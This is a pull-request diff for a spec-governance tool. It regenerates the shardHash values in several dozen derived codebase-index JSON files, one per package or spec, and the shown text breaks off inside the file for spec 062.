### PR TITLE
feat(073): a workflow bump is not a governed change

### DIFF
--- a/.derived/codebase-index/by-package/spec-spine-cli.json
+++ b/.derived/codebase-index/by-package/spec-spine-cli.json
@@ -6,5 +6,5 @@
     "specRef": "001-compile-registry"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "f284163c4ff8b4273e288c62f8790ab1c1af872fa4946ad9cbef831a781298e3"
+  "shardHash": "c2485b135a4dd8a068e851a40787f9ffc9a7c54cb674da42c862b285834b2c83"
 }

--- a/.derived/codebase-index/by-package/spec-spine-core.json
+++ b/.derived/codebase-index/by-package/spec-spine-core.json
@@ -6,5 +6,5 @@
     "specRef": "001-compile-registry"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "6810ad42366946d9b5c999193ad0f0d04ea590769bef213d1815c22b8c71ad5b"
+  "shardHash": "a9c1a9bd326e97ff274943641161159ec49a772d28b061ae33dbd17953bc8045"
 }

--- a/.derived/codebase-index/by-package/spec-spine-types.json
+++ b/.derived/codebase-index/by-package/spec-spine-types.json
@@ -6,5 +6,5 @@
     "specRef": "000-spec-spine-bootstrap"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "92a1836af28fdf952bbc25e7972879b3396d9d2521c94aa68abe7ea7cc132085"
+  "shardHash": "ebffbcd55ca6dc080c57050720e5072429a426a8d6a19b5eb5ecaade007a8a3c"
 }

--- a/.derived/codebase-index/by-package/spec-spine.json
+++ b/.derived/codebase-index/by-package/spec-spine.json
@@ -7,5 +7,5 @@
     "version": "0.17.0"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "63fc1f47565167af53a3b1bcce7e8057711c0df94913afd2c4c988c8631e827b"
+  "shardHash": "10ed7956f42393e60d3a9df614bb6e0b5112bb4f040b7d6cf964669e01a6b1d4"
 }

--- a/.derived/codebase-index/by-spec/000-spec-spine-bootstrap.json
+++ b/.derived/codebase-index/by-spec/000-spec-spine-bootstrap.json
@@ -26,5 +26,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "ceee234cce017d3e6c6a7a4c966ec15a3bf56fb3ffe0e7ea837ff3314b0235db"
+  "shardHash": "dd0673ada9b2f1e994c0e9f0f94e8b71b9118d2696f8b42478eb68ad5b355b60"
 }

--- a/.derived/codebase-index/by-spec/001-compile-registry.json
+++ b/.derived/codebase-index/by-spec/001-compile-registry.json
@@ -138,5 +138,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "25eb50c2757cb38f70949d4338c3e43426981964013b0f82e6cd814506e4b9a7"
+  "shardHash": "1a71d515e3dcd24685df0d1f866e837bb4b00c7000d677f0262813d1e0df4e36"
 }

--- a/.derived/codebase-index/by-spec/002-registry-query.json
+++ b/.derived/codebase-index/by-spec/002-registry-query.json
@@ -66,5 +66,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "c84695a6a03ab53a2c50b0f5c399567145d3d2dd11e4bcc433d7b13e401b28b5"
+  "shardHash": "f108f6fb611f8b4e14207705bf25580fe724da62851af7e09e3eea27c9fe51f1"
 }

--- a/.derived/codebase-index/by-spec/003-conformance-lint.json
+++ b/.derived/codebase-index/by-spec/003-conformance-lint.json
@@ -45,5 +45,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "33b296746f71cf968cfdae13b290652916af8648b32ee312fcb6675395a1da46"
+  "shardHash": "b10c9adb068beda7de5df8644a54c8cf9845848b0cf63c346b02909f76914f98"
 }

--- a/.derived/codebase-index/by-spec/004-codebase-index.json
+++ b/.derived/codebase-index/by-spec/004-codebase-index.json
@@ -131,5 +131,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "36616cbff8d3f639e4dcbff403c05774877c423a04c1070922d42fe8e37dafec"
+  "shardHash": "69aa3eddab1c10ba8e44209daf09be3bf0cfac1f480841dd0eece2ef781fc053"
 }

--- a/.derived/codebase-index/by-spec/005-coupling-gate.json
+++ b/.derived/codebase-index/by-spec/005-coupling-gate.json
@@ -132,5 +132,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "af9d1da6650a8803356821b0d99463537fa609dbf320e3a5ea9a54ef7fa06fc7"
+  "shardHash": "1d7b3169a8d5527a251243386397bcd1e266d31545b11a468666016a048cffd7"
 }

--- a/.derived/codebase-index/by-spec/006-init-scaffold.json
+++ b/.derived/codebase-index/by-spec/006-init-scaffold.json
@@ -113,5 +113,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "e8d8b6e8f643d88c1b7c51a88d5f14bdfa212abf6af4161a2f2b150cfb1bd131"
+  "shardHash": "819584e2954f7580a888d803629dbc393fa84f245e46886cffc4e9937dbeec05"
 }

--- a/.derived/codebase-index/by-spec/007-distribution.json
+++ b/.derived/codebase-index/by-spec/007-distribution.json
@@ -103,5 +103,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "873f7b88799f0565a53294e35fd992e836716c3d3416c30e8dda1c806f71ed14"
+  "shardHash": "97bacc09232f1fff322bea86980daf447587158d9efebfc3909af6be6104f1a8"
 }

--- a/.derived/codebase-index/by-spec/008-python-distribution.json
+++ b/.derived/codebase-index/by-spec/008-python-distribution.json
@@ -62,5 +62,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "f3133fa1d47dcea61e7ce6384b8f06819543b401963113c107e2a0b3a6135658"
+  "shardHash": "c23567137f46e9e0a721713470cacc07b9946cdf5a76eda5448907a014b8bf63"
 }

--- a/.derived/codebase-index/by-spec/009-coupling-floor-claim-precedence.json
+++ b/.derived/codebase-index/by-spec/009-coupling-floor-claim-precedence.json
@@ -82,5 +82,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "fbce50cb9feeaebd779e76977f916a21550b5c2c63678bf9e19642a5244928cf"
+  "shardHash": "f2ee2e1059d37d1fea0e8e306f08a6f094ecc69b68775e9573c2db9d808b09fa"
 }

--- a/.derived/codebase-index/by-spec/010-registry-query-projection-flags.json
+++ b/.derived/codebase-index/by-spec/010-registry-query-projection-flags.json
@@ -79,5 +79,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "b0131ca03c5ef954d27a4bbcd1eb294453b5526d91448d312e71b955376c6687"
+  "shardHash": "ac8b674a0d7076901b993acf751ac034dc52ab5ea44ee3ef07854e729335b49a"
 }

--- a/.derived/codebase-index/by-spec/011-index-render-orphans.json
+++ b/.derived/codebase-index/by-spec/011-index-render-orphans.json
@@ -96,5 +96,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "e867b492a26c4f56aa514ac742979f9154f85857bc11b925beaa52dd98d24dba"
+  "shardHash": "3b6f96197251167dab54f7c9188234733ef3d9c35cc0e5e1ee896ecc0b7ad80d"
 }

--- a/.derived/codebase-index/by-spec/012-index-hash-slices.json
+++ b/.derived/codebase-index/by-spec/012-index-hash-slices.json
@@ -164,5 +164,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "55a92bf21f06794bc5b5c95c0dbd4671c2ad683ae0d35ea8fd255ace748d1fe6"
+  "shardHash": "3def6de16887fa6504c6db9422a87eaa5639306ed9360701a92977080f595edc"
 }

--- a/.derived/codebase-index/by-spec/013-declared-extra-frontmatter-passthrough.json
+++ b/.derived/codebase-index/by-spec/013-declared-extra-frontmatter-passthrough.json
@@ -181,5 +181,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "34d66035c69e0e13795b6907d03bb204cbd6c70c83db525f1bbf7631d8ebf3a6"
+  "shardHash": "4c0c16aa2941470c9e64253fd9d7e92d58a77dfcfebd613b3c7b6754ec573750"
 }

--- a/.derived/codebase-index/by-spec/014-edge-paths-grammar-sugar.json
+++ b/.derived/codebase-index/by-spec/014-edge-paths-grammar-sugar.json
@@ -96,5 +96,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "a66935b3e86d000ca37c77d79b35a07a0fc4f1ad9b76bfef5ffd2784af878395"
+  "shardHash": "da13c4616a9b2c8c30fbeed34933697eb41c39a1835bc81e9362a9b1ecf4a35b"
 }

--- a/.derived/codebase-index/by-spec/015-establishes-wrapper-na-alias.json
+++ b/.derived/codebase-index/by-spec/015-establishes-wrapper-na-alias.json
@@ -79,5 +79,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "c9fce8aa108d8589db2767a44441bb66ff794649e70c70f276c1739594ea189c"
+  "shardHash": "cec62f750e12e1963fc4ad0e5f73299b7464297a8e8e42a15287dd7d90f9e373"
 }

--- a/.derived/codebase-index/by-spec/016-short-id-resolution.json
+++ b/.derived/codebase-index/by-spec/016-short-id-resolution.json
@@ -45,5 +45,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "fd344222d30eedff09d20e5fc6fa1533fa972b2e933b44b49365f261e6cd040f"
+  "shardHash": "2bbe636925e791bedd721a97a3e075065f1860491c56d09f69873f48350c7452"
 }

--- a/.derived/codebase-index/by-spec/017-directory-crate-module-units.json
+++ b/.derived/codebase-index/by-spec/017-directory-crate-module-units.json
@@ -130,5 +130,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "de30ee0d110f79e5533a55930794a94196e9aef187917f29e1c2e4bff2c8161f"
+  "shardHash": "7fafe83ee4cbaefb5f36b60d539a230155f3363f03ccf5006b084737ee9bb6dc"
 }

--- a/.derived/codebase-index/by-spec/018-constrains-discriminator-optional-unit.json
+++ b/.derived/codebase-index/by-spec/018-constrains-discriminator-optional-unit.json
@@ -114,5 +114,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "e21f8d42cf99f34102164794b35f307be4a6223c5e9f5b6c794f01eef6b96e49"
+  "shardHash": "b836cf0f878532041b4ee8fc1ea53a0173ecb18900c32864c20e2edac33efdb0"
 }

--- a/.derived/codebase-index/by-spec/019-structured-partial-supersedes.json
+++ b/.derived/codebase-index/by-spec/019-structured-partial-supersedes.json
@@ -250,5 +250,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "c97ef0383b4e2cf8217b87e53b4c8c4527ad7b3578abbbf69ca32e276de51308"
+  "shardHash": "bee23d8fe9ea1cb35ba85d1416943acd6609053756b51e128ad949494ff6dd7e"
 }

--- a/.derived/codebase-index/by-spec/020-derived-artifact-merge-driver.json
+++ b/.derived/codebase-index/by-spec/020-derived-artifact-merge-driver.json
@@ -30,5 +30,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "5e792b6607b0528600d68091ab6b5c9453df81957c7db6d6b8bf7d3e0cd2386b"
+  "shardHash": "b8969ea4085bf6b5a675291b911525c552c8a18832fc951049bb08fb3551372a"
 }

--- a/.derived/codebase-index/by-spec/021-release-supply-chain-artifacts.json
+++ b/.derived/codebase-index/by-spec/021-release-supply-chain-artifacts.json
@@ -45,5 +45,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "6a6497117f513b8bfeca5227fe554d20c7f58e20b01aeb8de0709d57bc099aef"
+  "shardHash": "ead7e8461034bf53bf0995d94c5a8dbd4d794f44a1e8d773e1ff20e4ac163123"
 }

--- a/.derived/codebase-index/by-spec/022-keypath-section-anchors.json
+++ b/.derived/codebase-index/by-spec/022-keypath-section-anchors.json
@@ -29,5 +29,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "3e4f6447aa440c6cdbb1cfcbc852dc621239255ba263ef851d51749447e2629c"
+  "shardHash": "55820ff8f5b2db3adc233f2cacb5c50ab47c22062c0581c9fdfa2f917b77b6c2"
 }

--- a/.derived/codebase-index/by-spec/023-ledger-seal.json
+++ b/.derived/codebase-index/by-spec/023-ledger-seal.json
@@ -197,5 +197,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "fd76969a35b050908c2408d1ff21a538e33ccb182cabc0747a4eb906979f169a"
+  "shardHash": "d48cce4e55019f12d2bb5a815e972b84c079a5457f11e6a2a0c7d29f669de3cf"
 }

--- a/.derived/codebase-index/by-spec/024-index-sharding.json
+++ b/.derived/codebase-index/by-spec/024-index-sharding.json
@@ -480,5 +480,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "e1feafdf5c05726b1b309e8d71474f4f67c3b155f4825ef7a56421c9a9466ac8"
+  "shardHash": "f994d5a2c65ad2828f4678ddcabc27d240ce9e3816d7d12ec68129d5fd34ffab"
 }

--- a/.derived/codebase-index/by-spec/025-unresolved-unit-severity.json
+++ b/.derived/codebase-index/by-spec/025-unresolved-unit-severity.json
@@ -97,5 +97,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "e72de079684168131fd9a84ee247b80c3789c36214b1911bc090e3a11696c996"
+  "shardHash": "39f530b01844491f73d450b5f115d0afe836f9511e9e36d7573004b3198bf28e"
 }

--- a/.derived/codebase-index/by-spec/026-resolution-discovery-fixes.json
+++ b/.derived/codebase-index/by-spec/026-resolution-discovery-fixes.json
@@ -80,5 +80,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "4404982742ddb7a0d0a5bd35f7ecc655e7b2b0a1bc16fb30724e02009bea0ba8"
+  "shardHash": "95aa69efe3531ff69c5f5375148d44ff59f3054dbd107ce4944d51838c4f2f85"
 }

--- a/.derived/codebase-index/by-spec/027-symbol-resolution-feature-gate.json
+++ b/.derived/codebase-index/by-spec/027-symbol-resolution-feature-gate.json
@@ -80,5 +80,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "8829f4fe443e09280cee875ca0f486ee196f008c7181320371d7b254ed419927"
+  "shardHash": "5998a7d5d7877b00efe9946eba17677232796101665167d9b1268f119c565204"
 }

--- a/.derived/codebase-index/by-spec/028-references-provenance-derived-at.json
+++ b/.derived/codebase-index/by-spec/028-references-provenance-derived-at.json
@@ -92,5 +92,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "de5b2bfee93cd96e1d16b4630a5cbfdc71814af47018ee2276eadaf050726fe0"
+  "shardHash": "d398866387e5aad9e7a170ee2257938708fb553a1498a7df2537651330d853f0"
 }

--- a/.derived/codebase-index/by-spec/029-claude-code-skill-kit.json
+++ b/.derived/codebase-index/by-spec/029-claude-code-skill-kit.json
@@ -28,5 +28,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "376fbf109c2e403078f4f1549d5e8cd190732eaebd54db35c5bbeaa9f645f34f"
+  "shardHash": "b8a5398f040e597b3e1f3579ff7406ce5fdffd1d4a89ecddb6d390320d33b6e1"
 }

--- a/.derived/codebase-index/by-spec/030-cargo-workflow-dependency-waiver.json
+++ b/.derived/codebase-index/by-spec/030-cargo-workflow-dependency-waiver.json
@@ -101,5 +101,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "09fe54f046e30251a9de8fe9885ee9533263f0b6bedc353cb32c547e666a2fcf"
+  "shardHash": "a5eb776890a4a4bc1b9ea0c190c4459ac67d9b0859ebf6aa703057aec3667ae2"
 }

--- a/.derived/codebase-index/by-spec/031-registry-freshness-check.json
+++ b/.derived/codebase-index/by-spec/031-registry-freshness-check.json
@@ -140,5 +140,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "80086cd8db5c472350b0484463844d41f44fc55585ea248a3344b2de66a93897"
+  "shardHash": "c861e72042590fa77bc5720c65cf46e078f5b8270d7dbf25ee8bc8677588c6a1"
 }

--- a/.derived/codebase-index/by-spec/032-ownership-coverage.json
+++ b/.derived/codebase-index/by-spec/032-ownership-coverage.json
@@ -247,5 +247,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "bdb3ffdee07fb7a32bcdab13171a6a56403cb9bea71d83793ae1e30af871bf4f"
+  "shardHash": "ce75ba2f08c6504a99ce35150c964e0194afc8080379d4595db7e6d53478d55e"
 }

--- a/.derived/codebase-index/by-spec/033-dependency-cycle-refusal.json
+++ b/.derived/codebase-index/by-spec/033-dependency-cycle-refusal.json
@@ -46,5 +46,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "49462970345621d8c6eb3f7ad3a0b53457a7bdd5f727c8aed1936f8c90b4c91a"
+  "shardHash": "2356708dcebf32b44311642730576c016581cba11c8fce7e6eeb993f46a64c0f"
 }

--- a/.derived/codebase-index/by-spec/034-references-non-owning-paths.json
+++ b/.derived/codebase-index/by-spec/034-references-non-owning-paths.json
@@ -49,5 +49,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "a08fc962dc913161fbdd7090c600805a6c8b306191d6a1fe2ba53975ed48ff66"
+  "shardHash": "f3a3bc518ebb7aa5439092536af2b28b0465216dc33572aee6d319b48fd5cf36"
 }

--- a/.derived/codebase-index/by-spec/035-stdout-closed-reader.json
+++ b/.derived/codebase-index/by-spec/035-stdout-closed-reader.json
@@ -199,5 +199,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "68c2df846aa459f10d284d5ddeff814aa5a46a572a32833ad9fb5901a5659533"
+  "shardHash": "dbd431e8095853b40f28e3fee5af9ed836f229fc04089be504d70a24a61585cf"
 }

--- a/.derived/codebase-index/by-spec/036-configured-corpus-root.json
+++ b/.derived/codebase-index/by-spec/036-configured-corpus-root.json
@@ -66,5 +66,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "c3b6c0de207f1c4ac173d74658ab722793ff5134fa79610f3d36aa8a09e01dcb"
+  "shardHash": "19cdf39dfb9625fa49f643d699e11370419c6b9a73a6170254797221fb740f99"
 }

--- a/.derived/codebase-index/by-spec/037-machine-readable-verdicts.json
+++ b/.derived/codebase-index/by-spec/037-machine-readable-verdicts.json
@@ -263,5 +263,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "c47b2d930f3df82a442141731c8bf771ad440dc1c20b7f526fd1b2b931edb3f1"
+  "shardHash": "e834a6d8855e5c184c0710a2d87493aa21fdd0375c3f83cf4941a607247bdd38"
 }

--- a/.derived/codebase-index/by-spec/038-registry-plan-ready-set.json
+++ b/.derived/codebase-index/by-spec/038-registry-plan-ready-set.json
@@ -126,5 +126,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "cd17bd5555e7acc09acbb4b4e59c23cc5f54f39c31e1cc173e2f8102b61c82c3"
+  "shardHash": "cb84d71d66d5bcb8a2e8f68a9d0b109c107b825f89d45aa5e020d9419bd1043d"
 }

--- a/.derived/codebase-index/by-spec/039-declared-state-dir.json
+++ b/.derived/codebase-index/by-spec/039-declared-state-dir.json
@@ -210,5 +210,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "20d16070ee482246edfb40385010700576b94a6befc264fa38fab2bb2956fc94"
+  "shardHash": "39a08dc8c9605c95bd19d8b04a90523cef194f3f862f4714924acb02b1be06f0"
 }

--- a/.derived/codebase-index/by-spec/040-amendment-authoring.json
+++ b/.derived/codebase-index/by-spec/040-amendment-authoring.json
@@ -72,5 +72,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "dc48782bfa079c2d98247d5476e0a97f6f333660564720fea55b5d4f2dc28992"
+  "shardHash": "2be22aaa38e92d166fce15b862d6806e9bfb5efb3ed555056928e2176fd9c284"
 }

--- a/.derived/codebase-index/by-spec/041-completion-held-to-claims.json
+++ b/.derived/codebase-index/by-spec/041-completion-held-to-claims.json
@@ -62,5 +62,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "b52302e529af3791e0f5da0b9b8d7231927a45454e615f3094d65d52b6dcaeed"
+  "shardHash": "cf39d401c2fe49876524d3809001069da5813b94ddae571d360749fc6ae547af"
 }

--- a/.derived/codebase-index/by-spec/042-per-spec-attestation.json
+++ b/.derived/codebase-index/by-spec/042-per-spec-attestation.json
@@ -229,5 +229,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "f22fc0b6430dfeb47a56a156544f3a4956d2bbf630d3e53e9bb20224bb102511"
+  "shardHash": "6bf35f6a2a599912a2e245e917a36f532607ad876b8dcfc6230bf5e43eb4bc20"
 }

--- a/.derived/codebase-index/by-spec/043-governance-document-gaps.json
+++ b/.derived/codebase-index/by-spec/043-governance-document-gaps.json
@@ -137,5 +137,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "22253e91f4e263c7e47e9e12bb278c5183045250655c67756cc01c837183e893"
+  "shardHash": "8e86ea192560078d7c441b3c40f8b1774cb54d9d5afaf8f34ab90ee182d378ee"
 }

--- a/.derived/codebase-index/by-spec/044-in-progress-is-in-flight.json
+++ b/.derived/codebase-index/by-spec/044-in-progress-is-in-flight.json
@@ -75,5 +75,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "8687ecf082870e72b485389da6fb07585fe4be867dc51bcb92c5106ef64f06d0"
+  "shardHash": "c4a1d92adeb6115fa5c3e365ed89739ac2db4c63be820c8bd96e0e532465e543"
 }

--- a/.derived/codebase-index/by-spec/045-absent-implementation-defers-to-status.json
+++ b/.derived/codebase-index/by-spec/045-absent-implementation-defers-to-status.json
@@ -136,5 +136,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "e791a1d74dd61cd1ec3fb5c2b2005367967d4daefc4b32111688da55dbc9d6d6"
+  "shardHash": "5400b4ed01d27c9c4ebf8c0aed2d3d7cfb1fc524464e098ac0c1368dca25a770"
 }

--- a/.derived/codebase-index/by-spec/046-kit-hooks-read-never-write.json
+++ b/.derived/codebase-index/by-spec/046-kit-hooks-read-never-write.json
@@ -75,5 +75,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "788b08b648553c3e6b2c8c2c099577790bde2547270c6c7dfefae0f57332b450"
+  "shardHash": "b41d706ac922f1f46304899c39fc00c966edd2803d8098252f32ba6a4a4d08f9"
 }

--- a/.derived/codebase-index/by-spec/047-harness-rules-name-the-legitimate-edits.json
+++ b/.derived/codebase-index/by-spec/047-harness-rules-name-the-legitimate-edits.json
@@ -200,5 +200,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "d79599fdef4916ce9dc96b343327af9391e79dc7e508aaa4015db2b82e7224cf"
+  "shardHash": "06c4f29b4dc884a47b561e69c8f2a7a970826bffc7094b6ed4ac17c434ec3f82"
 }

--- a/.derived/codebase-index/by-spec/048-kit-ships-the-governed-loop-skills.json
+++ b/.derived/codebase-index/by-spec/048-kit-ships-the-governed-loop-skills.json
@@ -217,5 +217,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "a8a5e84b1346dd2fc9d71da799bbdb03ccb2f19bc376a46c3088073ad8d81bb1"
+  "shardHash": "87643276b16260f24df6c0865ed6c73687c2d22c42eb9cc486180732b0531fb8"
 }

--- a/.derived/codebase-index/by-spec/049-verify-declared-acceptance.json
+++ b/.derived/codebase-index/by-spec/049-verify-declared-acceptance.json
@@ -239,5 +239,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "f551bea5a4efd177cc14c683d4d1445951419cc29e3def67bec84409fd6401dd"
+  "shardHash": "7c8b6ecc970dbc5abed07fc3eb4be362779ce765fa0042fd1db156fc417639b1"
 }

--- a/.derived/codebase-index/by-spec/050-index-diagnostics-reach-a-gate.json
+++ b/.derived/codebase-index/by-spec/050-index-diagnostics-reach-a-gate.json
@@ -141,5 +141,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "32a2aed65a028df4ff994a07053cbe33c2002fafc13a0e0692979aa165fe322b"
+  "shardHash": "f8adb8807264df63e99ed349e53fdb36d3cbf03bd05726131009609d5f6b9890"
 }

--- a/.derived/codebase-index/by-spec/051-harness-runs-the-verbs-it-ships.json
+++ b/.derived/codebase-index/by-spec/051-harness-runs-the-verbs-it-ships.json
@@ -197,5 +197,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "875402380961318e9e528b873fb2f53002b095f8226f6167e548f39e8678ff72"
+  "shardHash": "71131a1a3126321f15bd3784485de5500e9b4b5a2551e7a18652d02b1e304a52"
 }

--- a/.derived/codebase-index/by-spec/052-couple-names-the-crossing.json
+++ b/.derived/codebase-index/by-spec/052-couple-names-the-crossing.json
@@ -226,5 +226,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "e03e7a89b13a0a6fe06f850093908a7def98bb17094037fd48949e8ba9beea1a"
+  "shardHash": "b31396b65159875d4cba20d62c402d8f044b4a3dfdcb2d6321c6500ee737a3f6"
 }

--- a/.derived/codebase-index/by-spec/053-depends-on-ordinal-monotonicity.json
+++ b/.derived/codebase-index/by-spec/053-depends-on-ordinal-monotonicity.json
@@ -94,5 +94,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "b80e9b6023dfaba7403bff21e8ba8fd8b49c8e0c7a534cd8fc190d70c8c5e57e"
+  "shardHash": "69b3dc588f5fe12b713b08a95d1e5b64fd84676f51d4ac6892339678aaf7ef48"
 }

--- a/.derived/codebase-index/by-spec/054-effective-config-is-a-governed-read.json
+++ b/.derived/codebase-index/by-spec/054-effective-config-is-a-governed-read.json
@@ -158,5 +158,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "24b3b18cafc17fe314dc23b3a9374255480972f3383691f5695e53e668ae9971"
+  "shardHash": "6a1c87f77d7cd9a25ab16c2aeb9ed4639e5ff9e9ff0a4b656df2453b09b2e2f3"
 }

--- a/.derived/codebase-index/by-spec/055-the-ledger-answers-what-consumers-rebuild.json
+++ b/.derived/codebase-index/by-spec/055-the-ledger-answers-what-consumers-rebuild.json
@@ -163,5 +163,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "1905337195f420fe17ff963062a4ae9cc35191c6fb69f4d6490973aab6a2a483"
+  "shardHash": "f6cee12801b9002a33035c43ebdf7744b09230b39084ea739b6a703985d275ad"
 }

--- a/.derived/codebase-index/by-spec/056-compile-one-spec.json
+++ b/.derived/codebase-index/by-spec/056-compile-one-spec.json
@@ -196,5 +196,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "0c1406303e2bad772e1976c6ae164501ffd6a12295aab0217bbc1a7105465fba"
+  "shardHash": "09cf58ee2c5e4938ace4c55e72702a1428c9c44c2d7491243140b7d781162e05"
 }

--- a/.derived/codebase-index/by-spec/057-claimed-but-unwitnessed.json
+++ b/.derived/codebase-index/by-spec/057-claimed-but-unwitnessed.json
@@ -176,5 +176,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "31e9c350d3eed1074cc3796f666e34bd039b590d8cd6d711905bee9acfa85447"
+  "shardHash": "c97e3ad81177818cdea78e8f58d46de108f897f66399267d5548e6df5aacf6b4"
 }

--- a/.derived/codebase-index/by-spec/058-retroactive-adoption-shape.json
+++ b/.derived/codebase-index/by-spec/058-retroactive-adoption-shape.json
@@ -99,5 +99,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "7aa3a74d1a90ab4839a6b0fade9eeb6324ffceb5b5e7dae8cd15366a6e306163"
+  "shardHash": "2033d200befae8db9bb53d08150a44e75adde5d709a841bae63eb5aee37ba82a"
 }

--- a/.derived/codebase-index/by-spec/059-read-verbs-on-a-code-free-corpus.json
+++ b/.derived/codebase-index/by-spec/059-read-verbs-on-a-code-free-corpus.json
@@ -145,5 +145,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "977bbb7e7f89ece9bd491f40a4d8012670a9dc26ebe9e3539edbebaeda6857cb"
+  "shardHash": "3d0fa24aa9e63f7f398cf3c3641970c57618bc8b971b151d6766e192b86c3aaf"
 }

--- a/.derived/codebase-index/by-spec/060-plan-answers-the-whole-question.json
+++ b/.derived/codebase-index/by-spec/060-plan-answers-the-whole-question.json
@@ -124,5 +124,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "f4ac097d459ce52e9dfbd24eb87d4bee8e85f97b2d0cc67a55c2b790d58d20da"
+  "shardHash": "efb6d76ec0f39e89408be5ab1410763985147fadeebcd650b674f66be350efb0"
 }

--- a/.derived/codebase-index/by-spec/061-the-scaffold-ships-what-adopters-wrote.json
+++ b/.derived/codebase-index/by-spec/061-the-scaffold-ships-what-adopters-wrote.json
@@ -86,5 +86,5 @@
     "specStatus": "approved"
   },
   "schemaVersion": "1.1.0",
-  "shardHash": "898f74f2a7de551ee32315112a4a484aed9fa4824f8d870cbe6654604de6588d"
+  "shardHash": "80ded041878dd2865ec71cb912b50ee2a23da62cd346c4771391c8a7e5bb6bc9"
 }

--- a/.derived/codebase-index/by-spec/062-a-version-pin-the-cli-can-check.json
+++ b/.derived/codebase-index/by-spec/062-a-version-pin-the-cli-can-check.json
@@ -158,5 +158,5 @@
